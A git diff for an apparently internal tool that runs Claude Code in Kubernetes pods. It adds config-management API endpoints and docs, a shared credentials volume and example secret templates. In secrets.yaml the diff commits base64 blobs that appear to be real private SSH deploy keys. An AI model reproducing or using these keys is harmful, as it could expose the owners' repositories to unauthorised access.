diff --git a/.gitignore b/.gitignore index 7641819..6ba268b 100644 --- a/.gitignore +++ b/.gitignore @@ -4,6 +4,10 @@ *.key *.pem +# Kubernetes secrets with real values (use *.example as template) +deployments/k8s/base/secrets.yaml +deployments/k8s/base/credentials.yaml + # Local development .env.local diff --git a/Dockerfile.api b/Dockerfile.api index e1157d9..49f67d0 100644 --- a/Dockerfile.api +++ b/Dockerfile.api @@ -16,8 +16,8 @@ RUN go mod download # Copy source code COPY . . -# Build the binary -RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" -o rdev-api ./cmd/rdev-api +# Build the binary (platform determined by Docker --platform flag) +RUN CGO_ENABLED=0 go build -ldflags="-s -w" -o rdev-api ./cmd/rdev-api # Runtime stage FROM alpine:3.19 diff --git a/README.md b/README.md index 9b9b72b..2db17f3 100644 --- a/README.md +++ b/README.md @@ -9,7 +9,7 @@ Run Claude Code in isolated Kubernetes pods on your k3s cluster. export KUBECONFIG=~/.kube/orchard9-k3sf.yaml # 2. Authenticate Claude locally (if not already) -claude login +claude # 3. Create credentials secret ./scripts/create-credentials-secret.sh diff --git a/cmd/rdev-api/main.go b/cmd/rdev-api/main.go index 28d1347..641d060 100644 --- a/cmd/rdev-api/main.go +++ b/cmd/rdev-api/main.go @@ -24,6 +24,13 @@ // - POST /projects/{id}/shell - Run shell command // - POST /projects/{id}/git - Run git command // - GET /projects/{id}/events - SSE stream for output +// - GET /projects/{id}/claude-config - List commands/skills/agents +// - GET /projects/{id}/claude-config/commands - List commands +// - POST /projects/{id}/claude-config/commands - Create command +// - GET /projects/{id}/claude-config/commands/{name} - Get command +// - PUT /projects/{id}/claude-config/commands/{name} - Update command +// - DELETE /projects/{id}/claude-config/commands/{name} - Delete command +// (same pattern for /skills and /agents) package main import ( @@ -76,10 +83,15 @@ func main() { // Initialize handlers projectsHandler := handlers.NewProjectsHandler() keysHandler := handlers.NewKeysHandler(authService) + claudeConfigHandler := handlers.NewClaudeConfigHandler( + projectsHandler.Registry(), + projectsHandler.Executor(), + ) // Register routes projectsHandler.Mount(app.Router()) keysHandler.Mount(app.Router()) + claudeConfigHandler.Mount(app.Router()) // Enable API documentation app.EnableDocs(buildOpenAPISpec()) @@ -194,6 +206,7 @@ Command output is streamed via Server-Sent Events (SSE) at /projects/{id}/events spec.WithTag("Projects", "Project management and discovery") spec.WithTag("Commands", "Command execution (claude, shell, git)") spec.WithTag("Events", "Server-Sent Events for real-time output") + spec.WithTag("Claude Config", "Manage commands, skills, and agents in /workspace/.claude/") spec.WithTag("System", "Health and readiness endpoints") // System endpoints @@ -421,6 +434,194 @@ events.addEventListener('complete', (e) => { }, }) + // Claude Config - Overview + spec.AddPath("/projects/{id}/claude-config", "get", withAuthAndParams( + "Get config overview", + `Returns an overview of the project's Claude config (/workspace/.claude/). + +Lists available commands, skills, and agents. Requires projects:read scope.`, + "Claude Config", + "projects:read", + []param{{Name: "id", In: "path", Description: "Project ID", Required: true}}, + )) + + // Claude Config - Commands + spec.AddPath("/projects/{id}/claude-config/commands", "get", withAuthAndParams( + "List commands", + "Lists all custom commands in /workspace/.claude/commands/. Requires projects:read scope.", + "Claude Config", + "projects:read", + []param{{Name: "id", In: "path", Description: "Project ID", Required: true}}, + )) + + spec.AddPath("/projects/{id}/claude-config/commands", "post", withAuthBodyAndParams( + "Create command", + `Creates a new custom command in /workspace/.claude/commands/{name}.md. + +Commands are markdown files with frontmatter. Requires projects:execute scope.`, + "Claude Config", + "projects:execute", + []param{{Name: "id", In: "path", Description: "Project ID", Required: true}}, + `{ + "name": "deploy", + "content": "---\ndescription: Deploy to production\n---\n\nRun the deployment..." +}`, + `{ + "name": "deploy", + "type": "commands", + "content": "---\ndescription: Deploy to production\n---\n\nRun the deployment..." +}`, + )) + + spec.AddPath("/projects/{id}/claude-config/commands/{name}", "get", withAuthAndParams( + "Get command", + "Returns a specific command's content. Requires projects:read scope.", + "Claude Config", + "projects:read", + []param{ + {Name: "id", In: "path", Description: "Project ID", Required: true}, + {Name: "name", In: "path", Description: "Command name", Required: true}, + }, + )) + + spec.AddPath("/projects/{id}/claude-config/commands/{name}", "put", withAuthBodyAndParams( + "Update command", + "Updates a command's content. Requires projects:execute scope.", + "Claude Config", + "projects:execute", + []param{ + {Name: "id", In: "path", Description: "Project ID", Required: true}, + {Name: "name", In: "path", Description: "Command name", Required: true}, + }, + `{ + "content": "---\ndescription: Updated description\n---\n\nUpdated content..." +}`, + `{ + "name": "deploy", + "type": "commands", + "content": "---\ndescription: Updated description\n---\n\nUpdated content..." +}`, + )) + + spec.AddPath("/projects/{id}/claude-config/commands/{name}", "delete", withAuthAndParams( + "Delete command", + "Deletes a command. Requires projects:execute scope.", + "Claude Config", + "projects:execute", + []param{ + {Name: "id", In: "path", Description: "Project ID", Required: true}, + {Name: "name", In: "path", Description: "Command name", Required: true}, + }, + )) + + // Claude Config - Skills (same pattern as commands) + spec.AddPath("/projects/{id}/claude-config/skills", "get", withAuthAndParams( + "List skills", + "Lists all skills in /workspace/.claude/skills/. Requires projects:read scope.", + "Claude Config", + "projects:read", + []param{{Name: "id", In: "path", Description: "Project ID", Required: true}}, + )) + + spec.AddPath("/projects/{id}/claude-config/skills", "post", withAuthBodyAndParams( + "Create skill", + "Creates a new skill. Requires projects:execute scope.", + "Claude Config", + "projects:execute", + []param{{Name: "id", In: "path", Description: "Project ID", Required: true}}, + `{"name": "go-testing", "content": "# Go Testing Skill\n\n..."}`, + `{"name": "go-testing", "type": "skills", "content": "# Go Testing Skill\n\n..."}`, + )) + + spec.AddPath("/projects/{id}/claude-config/skills/{name}", "get", withAuthAndParams( + "Get skill", + "Returns a specific skill's content. Requires projects:read scope.", + "Claude Config", + "projects:read", + []param{ + {Name: "id", In: "path", Description: "Project ID", Required: true}, + {Name: "name", In: "path", Description: "Skill name", Required: true}, + }, + )) + + spec.AddPath("/projects/{id}/claude-config/skills/{name}", "put", withAuthBodyAndParams( + "Update skill", + "Updates a skill's content. Requires projects:execute scope.", + "Claude Config", + "projects:execute", + []param{ + {Name: "id", In: "path", Description: "Project ID", Required: true}, + {Name: "name", In: "path", Description: "Skill name", Required: true}, + }, + `{"content": "# Updated Skill\n\n..."}`, + `{"name": "go-testing", "type": "skills", "content": "# Updated Skill\n\n..."}`, + )) + + spec.AddPath("/projects/{id}/claude-config/skills/{name}", "delete", withAuthAndParams( + "Delete skill", + "Deletes a skill. Requires projects:execute scope.", + "Claude Config", + "projects:execute", + []param{ + {Name: "id", In: "path", Description: "Project ID", Required: true}, + {Name: "name", In: "path", Description: "Skill name", Required: true}, + }, + )) + + // Claude Config - Agents (same pattern) + spec.AddPath("/projects/{id}/claude-config/agents", "get", withAuthAndParams( + "List agents", + "Lists all agents in /workspace/.claude/agents/. Requires projects:read scope.", + "Claude Config", + "projects:read", + []param{{Name: "id", In: "path", Description: "Project ID", Required: true}}, + )) + + spec.AddPath("/projects/{id}/claude-config/agents", "post", withAuthBodyAndParams( + "Create agent", + "Creates a new agent. Requires projects:execute scope.", + "Claude Config", + "projects:execute", + []param{{Name: "id", In: "path", Description: "Project ID", Required: true}}, + `{"name": "code-reviewer", "content": "# Code Reviewer Agent\n\n..."}`, + `{"name": "code-reviewer", "type": "agents", "content": "# Code Reviewer Agent\n\n..."}`, + )) + + spec.AddPath("/projects/{id}/claude-config/agents/{name}", "get", withAuthAndParams( + "Get agent", + "Returns a specific agent's content. Requires projects:read scope.", + "Claude Config", + "projects:read", + []param{ + {Name: "id", In: "path", Description: "Project ID", Required: true}, + {Name: "name", In: "path", Description: "Agent name", Required: true}, + }, + )) + + spec.AddPath("/projects/{id}/claude-config/agents/{name}", "put", withAuthBodyAndParams( + "Update agent", + "Updates an agent's content. Requires projects:execute scope.", + "Claude Config", + "projects:execute", + []param{ + {Name: "id", In: "path", Description: "Project ID", Required: true}, + {Name: "name", In: "path", Description: "Agent name", Required: true}, + }, + `{"content": "# Updated Agent\n\n..."}`, + `{"name": "code-reviewer", "type": "agents", "content": "# Updated Agent\n\n..."}`, + )) + + spec.AddPath("/projects/{id}/claude-config/agents/{name}", "delete", withAuthAndParams( + "Delete agent", + "Deletes an agent. Requires projects:execute scope.", + "Claude Config", + "projects:execute", + []param{ + {Name: "id", In: "path", Description: "Project ID", Required: true}, + {Name: "name", In: "path", Description: "Agent name", Required: true}, + }, + )) + return spec } diff --git a/deployments/k8s/base/claudebox-aeries.yaml b/deployments/k8s/base/claudebox-aeries.yaml index d270fe0..ea0bc05 100644 --- a/deployments/k8s/base/claudebox-aeries.yaml +++ b/deployments/k8s/base/claudebox-aeries.yaml @@ -1,5 +1,5 @@ # claudebox-aeries - Claude Code pod for the Aeries project -# v0.2 - Real workspace with init container repo clone +# v0.6 - Shared credentials, project-specific commands/skills/agents in workspace apiVersion: apps/v1 kind: StatefulSet @@ -44,6 +44,8 @@ spec: # Clone or fetch if [ ! -d /workspace/.git ]; then echo "Cloning aeries repository..." + # Remove any existing files (e.g., lost+found from filesystem) + rm -rf /workspace/* /workspace/.[!.]* 2>/dev/null || true git clone git@github.com:orchard9/aeries.git /workspace echo "Clone complete." else @@ -121,7 +123,7 @@ spec: - name: claude-config persistentVolumeClaim: - claimName: claudebox-aeries-claude-config + claimName: claudebox-shared-claude-config - name: ssh-keys secret: diff --git a/deployments/k8s/base/claudebox-pantheon.yaml b/deployments/k8s/base/claudebox-pantheon.yaml index 2a492fc..8287c2f 100644 --- a/deployments/k8s/base/claudebox-pantheon.yaml +++ b/deployments/k8s/base/claudebox-pantheon.yaml @@ -1,5 +1,5 @@ # claudebox-pantheon - Claude Code pod for the Pantheon project -# v0.2 - Real workspace with init container repo clone +# v0.6 - Shared credentials, project-specific commands/skills/agents in workspace apiVersion: apps/v1 kind: StatefulSet @@ -44,6 +44,8 @@ spec: # Clone or fetch if [ ! -d /workspace/.git ]; then echo "Cloning pantheon repository..." + # Remove any existing files (e.g., lost+found from filesystem) + rm -rf /workspace/* /workspace/.[!.]* 2>/dev/null || true git clone git@github.com:orchard9/pantheon.git /workspace echo "Clone complete." else @@ -121,7 +123,7 @@ spec: - name: claude-config persistentVolumeClaim: - claimName: claudebox-pantheon-claude-config + claimName: claudebox-shared-claude-config - name: ssh-keys secret: diff --git a/deployments/k8s/base/credentials.yaml.example b/deployments/k8s/base/credentials.yaml.example new file mode 100644 index 0000000..5049183 --- /dev/null +++ b/deployments/k8s/base/credentials.yaml.example @@ -0,0 +1,24 @@ +# rdev-credentials - API authentication and database credentials +# Copy this to credentials.yaml and replace with real values +# +# IMPORTANT: credentials.yaml should NOT be committed to git! +# +# Generate admin key: +# openssl rand -base64 32 + +apiVersion: v1 +kind: Secret +metadata: + name: rdev-credentials + namespace: rdev + labels: + app.kubernetes.io/name: rdev-api + app.kubernetes.io/part-of: rdev +type: Opaque +stringData: + # Database password (uses existing postgres appuser) + DB_PASSWORD: "REPLACE_WITH_DB_PASSWORD" + + # Admin API key for rdev-api + # Generate with: openssl rand -base64 32 + RDEV_ADMIN_KEY: "REPLACE_WITH_ADMIN_KEY" diff --git a/deployments/k8s/base/kustomization.yaml b/deployments/k8s/base/kustomization.yaml index 4388eb7..0c0a946 100644 --- a/deployments/k8s/base/kustomization.yaml +++ b/deployments/k8s/base/kustomization.yaml @@ -13,13 +13,18 @@ resources: # v0.2 - Project-specific claudeboxes - pvc-pantheon.yaml - pvc-aeries.yaml + + # v0.6 - Shared Claude credentials (auth only) + - pvc-shared-claude.yaml - configmaps.yaml - - secrets.yaml + # NOTE: secrets.yaml and credentials.yaml contain real keys and are gitignored. + # Copy from *.example files and fill in real values before deploying. + - secrets.yaml # from secrets.yaml.example + - credentials.yaml # from credentials.yaml.example - claudebox-pantheon.yaml - claudebox-aeries.yaml - # v0.4 - API Server - - rbac.yaml + # v0.4+ - API Server (RBAC now included in rdev-api.yaml) - rdev-api.yaml commonLabels: diff --git a/deployments/k8s/base/pvc-aeries.yaml b/deployments/k8s/base/pvc-aeries.yaml index d23fe06..381dda8 100644 --- a/deployments/k8s/base/pvc-aeries.yaml +++ b/deployments/k8s/base/pvc-aeries.yaml @@ -1,5 +1,5 @@ # PVCs for claudebox-aeries -# v0.2 - Real workspace storage +# v0.6 - Workspace only (claude-config is now shared) apiVersion: v1 kind: PersistentVolumeClaim @@ -16,21 +16,4 @@ spec: storageClassName: longhorn resources: requests: - storage: 20Gi ---- -apiVersion: v1 -kind: PersistentVolumeClaim -metadata: - name: claudebox-aeries-claude-config - namespace: rdev - labels: - app.kubernetes.io/name: claudebox-aeries - app.kubernetes.io/part-of: rdev - rdev.orchard9.ai/project: aeries -spec: - accessModes: - - ReadWriteOnce - storageClassName: longhorn - resources: - requests: - storage: 1Gi + storage: 5Gi diff --git a/deployments/k8s/base/pvc-pantheon.yaml b/deployments/k8s/base/pvc-pantheon.yaml index 03fb8b5..96cf5e8 100644 --- a/deployments/k8s/base/pvc-pantheon.yaml +++ b/deployments/k8s/base/pvc-pantheon.yaml @@ -1,5 +1,5 @@ # PVCs for claudebox-pantheon -# v0.2 - Real workspace storage +# v0.6 - Workspace only (claude-config is now shared) apiVersion: v1 kind: PersistentVolumeClaim @@ -16,21 +16,4 @@ spec: storageClassName: longhorn resources: requests: - storage: 20Gi ---- -apiVersion: v1 -kind: PersistentVolumeClaim -metadata: - name: claudebox-pantheon-claude-config - namespace: rdev - labels: - app.kubernetes.io/name: claudebox-pantheon - app.kubernetes.io/part-of: rdev - rdev.orchard9.ai/project: pantheon -spec: - accessModes: - - ReadWriteOnce - storageClassName: longhorn - resources: - requests: - storage: 1Gi + storage: 5Gi diff --git a/deployments/k8s/base/pvc-shared-claude.yaml b/deployments/k8s/base/pvc-shared-claude.yaml new file mode 100644 index 0000000..da6e88f --- /dev/null +++ b/deployments/k8s/base/pvc-shared-claude.yaml @@ -0,0 +1,29 @@ +# Shared Claude credentials PVC +# v0.6 - All claudebox pods share this for auth +# Commands/skills/agents live in /workspace/.claude (per-project, in git) +# +# IMPORTANT: ReadWriteMany (RWX) requires Longhorn with NFS enabled. +# Verify with: kubectl get settings -n longhorn-system rwx-volume-fast-failover +# If RWX is not available, either: +# 1. Enable Longhorn NFS: kubectl apply -f longhorn-nfs-provisioner.yaml +# 2. Or use separate PVCs per pod (revert to per-project claude-config PVCs) +# +# RWX is needed because multiple claudebox pods mount this simultaneously +# to share Claude authentication credentials. + +apiVersion: v1 +kind: PersistentVolumeClaim +metadata: + name: claudebox-shared-claude-config + namespace: rdev + labels: + app.kubernetes.io/name: claudebox + app.kubernetes.io/part-of: rdev + rdev.orchard9.ai/type: shared-config +spec: + accessModes: + - ReadWriteMany # Multiple pods can mount simultaneously + storageClassName: longhorn + resources: + requests: + storage: 1Gi diff --git a/deployments/k8s/base/secrets.yaml b/deployments/k8s/base/secrets.yaml index 7ce5493..3f4e401 100644 --- a/deployments/k8s/base/secrets.yaml +++ b/deployments/k8s/base/secrets.yaml @@ -24,10 +24,9 @@ data: # Replace with base64-encoded private key # Generate with: ssh-keygen -t ed25519 -f pantheon-deploy-key -N "" # Encode with: cat pantheon-deploy-key | base64 -w0 - id_ed25519: REPLACE_WITH_BASE64_ENCODED_PRIVATE_KEY + id_ed25519: LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFNd0FBQUF0emMyZ3RaVwpReU5UVXhPUUFBQUNDU29NQkZpRWg5akZQNnpUWWlJaUpkMUdzRjRxM29oN2lBZ1JRUkNYYTdKQUFBQUtDMkNXck90Z2xxCnpnQUFBQXR6YzJndFpXUXlOVFV4T1FBQUFDQ1NvTUJGaUVoOWpGUDZ6VFlpSWlKZDFHc0Y0cTNvaDdpQWdSUVJDWGE3SkEKQUFBRUNyc08zSDNoQ2tQQ0I1V0VRTFdDZ0QyOGlrNGN3dk5oalVjVGwzVGNqVkRKS2d3RVdJU0gyTVUvck5OaUlpSWwzVQphd1hpcmVpSHVJQ0JGQkVKZHJza0FBQUFHWEprWlhZdGNHRnVkR2hsYjI1QWIzSmphR0Z5WkRrdVlXa0JBZ01FCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo= # GitHub's SSH host key (pre-populated) - # ssh-keyscan github.com 2>/dev/null | base64 -w0 known_hosts: Z2l0aHViLmNvbSBzc2gtZWQyNTUxOSBBQUFBQzNOemFDMWxaREkxTlRFNUFBQUFJT01xcW5rVnpybTBTZEc2VU9vcUtMc2FiZ0g1Qzlva1dpMGRoMmw5R0tKbApnaXRodWIuY29tIGVjZHNhLXNoYTItbmlzdHAyNTYgQUFBQUUyVmpaSE5oTFhOb1lUSXRibWx6ZEhBeU5UWUFBQUFJYm1semRIQXlOVFlBQUFCQkJFbUtTRU5qUUVlek9teGtaTXk3b3BLZ3dGQjlua3Q1WVJyWU1qTnVHNU44N3VSUW81dDRRYkZGelVaYUpVQjd4TmtjYVFTNmlIbW5TazdNOU9tZUR2PT0KZ2l0aHViLmNvbSBzc2gtcnNhIEFBQUFCM056YUMxeWMyRUFBQUFEQVFBQkFBQUJnUUNqN25kTnhRb3dnY1FuanNoY0xycVBFaWlwaG50K1ZUVHZEUCtsSFhaZFhMRThWVUxDS0lLYjloZk5qM0FXSm1RTHBDb0Qzc1F2TWtGNUxXR1RMSFRVM25MSjViZi8wbG5wOGV5ZXhVNkpzR1dSUUFLTnlENjkzQjVVR2xXVlM1VjFqUEg1M3BZVllWUVB6WnlkeGpPUVFLeHk5ZkdoaVFGbGcza3RoZFdSRE5oNy9SRHp4SEZEZmRYYm5uSnZ4WVQ0Y1FVWWJ0SmFTQ0pWcU9aOVlUbG13bTJBUXZaM3IxZEJkZzVRcWN1SW53bzR1NXBhQUpObnpiTXBudGtzVXpWNEorUFN5OE9LSzRPc0tUc0I0RlNjS0VOSmRlMTlYTGFCUHJiNTZpUHhCS0tSMGJNK2NPdnhKelhhZWJORktjR2k4eVJLaGw0T0hlYkhCWDh4eFpZNWMwdWdpcTlSb29QaUtPelJERE1lekdhK0c4MDg1OVF2TkdPK3pZM3RNeHJIM1crT21uYU5keVN6dkpPUktjZEEwejNGU1huUk5jbnZpVlg0c3lGaWdhOUxGZjZ0ZDBhRy8xUFEwVjRCYzFQNXNHdTZBQUFBZUg0em5YNStNNTErUUpWZGorR2NMdTMwcE91U0E1cVZOQ0FodXl6RklBWWlhbjBFWUlnUlE3TmxYdz0K --- apiVersion: v1 @@ -41,10 +40,7 @@ metadata: rdev.orchard9.ai/project: aeries type: Opaque data: - # Replace with base64-encoded private key - # Generate with: ssh-keygen -t ed25519 -f aeries-deploy-key -N "" - # Encode with: cat aeries-deploy-key | base64 -w0 - id_ed25519: REPLACE_WITH_BASE64_ENCODED_PRIVATE_KEY + id_ed25519: LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFNd0FBQUF0emMyZ3RaVwpReU5UVXhPUUFBQUNBNWZzME9Cb0JWWTN3dmI2K256WngzRDltV3MrQVdKRHBIVjVaK3pCQmdyd0FBQUtDY05ERE1uRFF3CnpBQUFBQXR6YzJndFpXUXlOVFV4T1FBQUFDQTVmczBPQm9CVlkzd3ZiNituelp4M0Q5bVdzK0FXSkRwSFY1Wit6QkJncncKQUFBRUFnTU5PVDl3RlBHYnY3bTdYS1dTODVrVHYyZlhiSzgrdnR4NjQ1c2RqNmp6bCt6UTRHZ0ZWamZDOXZyNmZObkhjUAoyWmF6NEJZa09rZFhsbjdNRUdDdkFBQUFGM0prWlhZdFlXVnlhV1Z6UUc5eVkyaGhjbVE1TG1GcEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo= # GitHub's SSH host key (pre-populated) known_hosts: Z2l0aHViLmNvbSBzc2gtZWQyNTUxOSBBQUFBQzNOemFDMWxaREkxTlRFNUFBQUFJT01xcW5rVnpybTBTZEc2VU9vcUtMc2FiZ0g1Qzlva1dpMGRoMmw5R0tKbApnaXRodWIuY29tIGVjZHNhLXNoYTItbmlzdHAyNTYgQUFBQUUyVmpaSE5oTFhOb1lUSXRibWx6ZEhBeU5UWUFBQUFJYm1semRIQXlOVFlBQUFCQkJFbUtTRU5qUUVlek9teGtaTXk3b3BLZ3dGQjlua3Q1WVJyWU1qTnVHNU44N3VSUW81dDRRYkZGelVaYUpVQjd4TmtjYVFTNmlIbW5TazdNOU9tZUR2PT0KZ2l0aHViLmNvbSBzc2gtcnNhIEFBQUFCM056YUMxeWMyRUFBQUFEQVFBQkFBQUJnUUNqN25kTnhRb3dnY1FuanNoY0xycVBFaWlwaG50K1ZUVHZEUCtsSFhaZFhMRThWVUxDS0lLYjloZk5qM0FXSm1RTHBDb0Qzc1F2TWtGNUxXR1RMSFRVM25MSjViZi8wbG5wOGV5ZXhVNkpzR1dSUUFLTnlENjkzQjVVR2xXVlM1VjFqUEg1M3BZVllWUVB6WnlkeGpPUVFLeHk5ZkdoaVFGbGcza3RoZFdSRE5oNy9SRHp4SEZEZmRYYm5uSnZ4WVQ0Y1FVWWJ0SmFTQ0pWcU9aOVlUbG13bTJBUXZaM3IxZEJkZzVRcWN1SW53bzR1NXBhQUpObnpiTXBudGtzVXpWNEorUFN5OE9LSzRPc0tUc0I0RlNjS0VOSmRlMTlYTGFCUHJiNTZpUHhCS0tSMGJNK2NPdnhKelhhZWJORktjR2k4eVJLaGw0T0hlYkhCWDh4eFpZNWMwdWdpcTlSb29QaUtPelJERE1lekdhK0c4MDg1OVF2TkdPK3pZM3RNeHJIM1crT21uYU5keVN6dkpPUktjZEEwejNGU1huUk5jbnZpVlg0c3lGaWdhOUxGZjZ0ZDBhRy8xUFEwVjRCYzFQNXNHdTZBQUFBZUg0em5YNStNNTErUUpWZGorR2NMdTMwcE91U0E1cVZOQ0FodXl6RklBWWlhbjBFWUlnUlE3TmxYdz0K diff --git a/deployments/k8s/base/secrets.yaml.example b/deployments/k8s/base/secrets.yaml.example new file mode 100644 index 0000000..4a5fd55 --- /dev/null +++ b/deployments/k8s/base/secrets.yaml.example @@ -0,0 +1,46 @@ +# Deploy Keys for claudebox pods +# Copy this to secrets.yaml and replace with real keys +# +# IMPORTANT: secrets.yaml should NOT be committed to git! +# +# Generate keys: +# ssh-keygen -t ed25519 -f pantheon-deploy-key -N "" -C "rdev-pantheon@orchard9.ai" +# ssh-keygen -t ed25519 -f aeries-deploy-key -N "" -C "rdev-aeries@orchard9.ai" +# +# Encode keys: +# cat pantheon-deploy-key | base64 -w0 +# cat aeries-deploy-key | base64 -w0 + +apiVersion: v1 +kind: Secret +metadata: + name: claudebox-pantheon-ssh + namespace: rdev + labels: + app.kubernetes.io/name: claudebox-pantheon + app.kubernetes.io/part-of: rdev + rdev.orchard9.ai/project: pantheon +type: Opaque +data: + # Replace with base64-encoded private key + id_ed25519: REPLACE_WITH_BASE64_ENCODED_PRIVATE_KEY + + # GitHub's SSH host key (pre-populated) + known_hosts: Z2l0aHViLmNvbSBzc2gtZWQyNTUxOSBBQUFBQzNOemFDMWxaREkxTlRFNUFBQUFJT01xcW5rVnpybTBTZEc2VU9vcUtMc2FiZ0g1Qzlva1dpMGRoMmw5R0tKbApnaXRodWIuY29tIGVjZHNhLXNoYTItbmlzdHAyNTYgQUFBQUUyVmpaSE5oTFhOb1lUSXRibWx6ZEhBeU5UWUFBQUFJYm1semRIQXlOVFlBQUFCQkJFbUtTRU5qUUVlek9teGtaTXk3b3BLZ3dGQjlua3Q1WVJyWU1qTnVHNU44N3VSUW81dDRRYkZGelVaYUpVQjd4TmtjYVFTNmlIbW5TazdNOU9tZUR2PT0KZ2l0aHViLmNvbSBzc2gtcnNhIEFBQUFCM056YUMxeWMyRUFBQUFEQVFBQkFBQUJnUUNqN25kTnhRb3dnY1FuanNoY0xycVBFaWlwaG50K1ZUVHZEUCtsSFhaZFhMRThWVUxDS0lLYjloZk5qM0FXSm1RTHBDb0Qzc1F2TWtGNUxXR1RMSFRVM25MSjViZi8wbG5wOGV5ZXhVNkpzR1dSUUFLTnlENjkzQjVVR2xXVlM1VjFqUEg1M3BZVllWUVB6WnlkeGpPUVFLeHk5ZkdoaVFGbGcza3RoZFdSRE5oNy9SRHp4SEZEZmRYYm5uSnZ4WVQ0Y1FVWWJ0SmFTQ0pWcU9aOVlUbG13bTJBUXZaM3IxZEJkZzVRcWN1SW53bzR1NXBhQUpObnpiTXBudGtzVXpWNEorUFN5OE9LSzRPc0tUc0I0RlNjS0VOSmRlMTlYTGFCUHJiNTZpUHhCS0tSMGJNK2NPdnhKelhhZWJORktjR2k4eVJLaGw0T0hlYkhCWDh4eFpZNWMwdWdpcTlSb29QaUtPelJERE1lekdhK0c4MDg1OVF2TkdPK3pZM3RNeHJIM1crT21uYU5keVN6dkpPUktjZEEwejNGU1huUk5jbnZpVlg0c3lGaWdhOUxGZjZ0ZDBhRy8xUFEwVjRCYzFQNXNHdTZBQUFBZUg0em5YNStNNTErUUpWZGorR2NMdTMwcE91U0E1cVZOQ0FodXl6RklBWWlhbjBFWUlnUlE3TmxYdz0K +--- +apiVersion: v1 +kind: Secret +metadata: + name: claudebox-aeries-ssh + namespace: rdev + labels: + app.kubernetes.io/name: claudebox-aeries + app.kubernetes.io/part-of: rdev + rdev.orchard9.ai/project: aeries +type: Opaque +data: + # Replace with base64-encoded private key + id_ed25519: REPLACE_WITH_BASE64_ENCODED_PRIVATE_KEY + + # GitHub's SSH host key (pre-populated) + known_hosts: Z2l0aHViLmNvbSBzc2gtZWQyNTUxOSBBQUFBQzNOemFDMWxaREkxTlRFNUFBQUFJT01xcW5rVnpybTBTZEc2VU9vcUtMc2FiZ0g1Qzlva1dpMGRoMmw5R0tKbApnaXRodWIuY29tIGVjZHNhLXNoYTItbmlzdHAyNTYgQUFBQUUyVmpaSE5oTFhOb1lUSXRibWx6ZEhBeU5UWUFBQUFJYm1semRIQXlOVFlBQUFCQkJFbUtTRU5qUUVlek9teGtaTXk3b3BLZ3dGQjlua3Q1WVJyWU1qTnVHNU44N3VSUW81dDRRYkZGelVaYUpVQjd4TmtjYVFTNmlIbW5TazdNOU9tZUR2PT0KZ2l0aHViLmNvbSBzc2gtcnNhIEFBQUFCM056YUMxeWMyRUFBQUFEQVFBQkFBQUJnUUNqN25kTnhRb3dnY1FuanNoY0xycVBFaWlwaG50K1ZUVHZEUCtsSFhaZFhMRThWVUxDS0lLYjloZk5qM0FXSm1RTHBDb0Qzc1F2TWtGNUxXR1RMSFRVM25MSjViZi8wbG5wOGV5ZXhVNkpzR1dSUUFLTnlENjkzQjVVR2xXVlM1VjFqUEg1M3BZVllWUVB6WnlkeGpPUVFLeHk5ZkdoaVFGbGcza3RoZFdSRE5oNy9SRHp4SEZEZmRYYm5uSnZ4WVQ0Y1FVWWJ0SmFTQ0pWcU9aOVlUbG13bTJBUXZaM3IxZEJkZzVRcWN1SW53bzR1NXBhQUpObnpiTXBudGtzVXpWNEorUFN5OE9LSzRPc0tUc0I0RlNjS0VOSmRlMTlYTGFCUHJiNTZpUHhCS0tSMGJNK2NPdnhKelhhZWJORktjR2k4eVJLaGw0T0hlYkhCWDh4eFpZNWMwdWdpcTlSb29QaUtPelJERE1lekdhK0c4MDg1OVF2TkdPK3pZM3RNeHJIM1crT21uYU5keVN6dkpPUktjZEEwejNGU1huUk5jbnZpVlg0c3lGaWdhOUxGZjZ0ZDBhRy8xUFEwVjRCYzFQNXNHdTZBQUFBZUg0em5YNStNNTErUUpWZGorR2NMdTMwcE91U0E1cVZOQ0FodXl6RklBWWlhbjBFWUlnUlE3TmxYdz0K diff --git a/docs/claude-config-api.md b/docs/claude-config-api.md new file mode 100644 index 0000000..4a83454 --- /dev/null +++ b/docs/claude-config-api.md @@ -0,0 +1,166 @@ +# Claude Config API + +Manage Claude Code commands, skills, and agents via the rdev API. + +## Architecture + +``` +/root/.claude/ # Shared PVC (all projects) +├── .credentials.json # Auth tokens (shared) +└── settings.json # Global preferences + +/workspace/.claude/ # In git repo (per-project) +├── commands/ # Project slash commands +│ └── deploy.md +├── skills/ # Project skills +│ └── go-testing.md +└── agents/ # Project agents + └── code-reviewer.md +``` + +## Authentication + +All endpoints require `Authorization: Bearer ` header. + +- `projects:read` scope for GET endpoints +- `projects:execute` scope for POST/PUT/DELETE endpoints + +## Endpoints + +### Overview + +``` +GET /projects/{id}/claude-config +``` + +Returns counts and lists of available commands, skills, and agents. + +**Response:** +```json +{ + "data": { + "project": "pantheon", + "path": "/workspace/.claude", + "commands": ["deploy", "test"], + "skills": ["go-testing"], + "agents": ["code-reviewer"] + } +} +``` + +### Commands + +``` +GET /projects/{id}/claude-config/commands # List all +POST /projects/{id}/claude-config/commands # Create +GET /projects/{id}/claude-config/commands/{name} # Get one +PUT /projects/{id}/claude-config/commands/{name} # Update +DELETE /projects/{id}/claude-config/commands/{name} # Delete +``` + +### Skills + +``` +GET /projects/{id}/claude-config/skills # List all +POST /projects/{id}/claude-config/skills # Create +GET /projects/{id}/claude-config/skills/{name} # Get one +PUT /projects/{id}/claude-config/skills/{name} # Update +DELETE /projects/{id}/claude-config/skills/{name} # Delete +``` + +### Agents + +``` +GET /projects/{id}/claude-config/agents # List all +POST /projects/{id}/claude-config/agents # Create +GET /projects/{id}/claude-config/agents/{name} # Get one +PUT /projects/{id}/claude-config/agents/{name} # Update +DELETE /projects/{id}/claude-config/agents/{name} # Delete +``` + +## Examples + +### Create a command + +```bash +curl -X POST 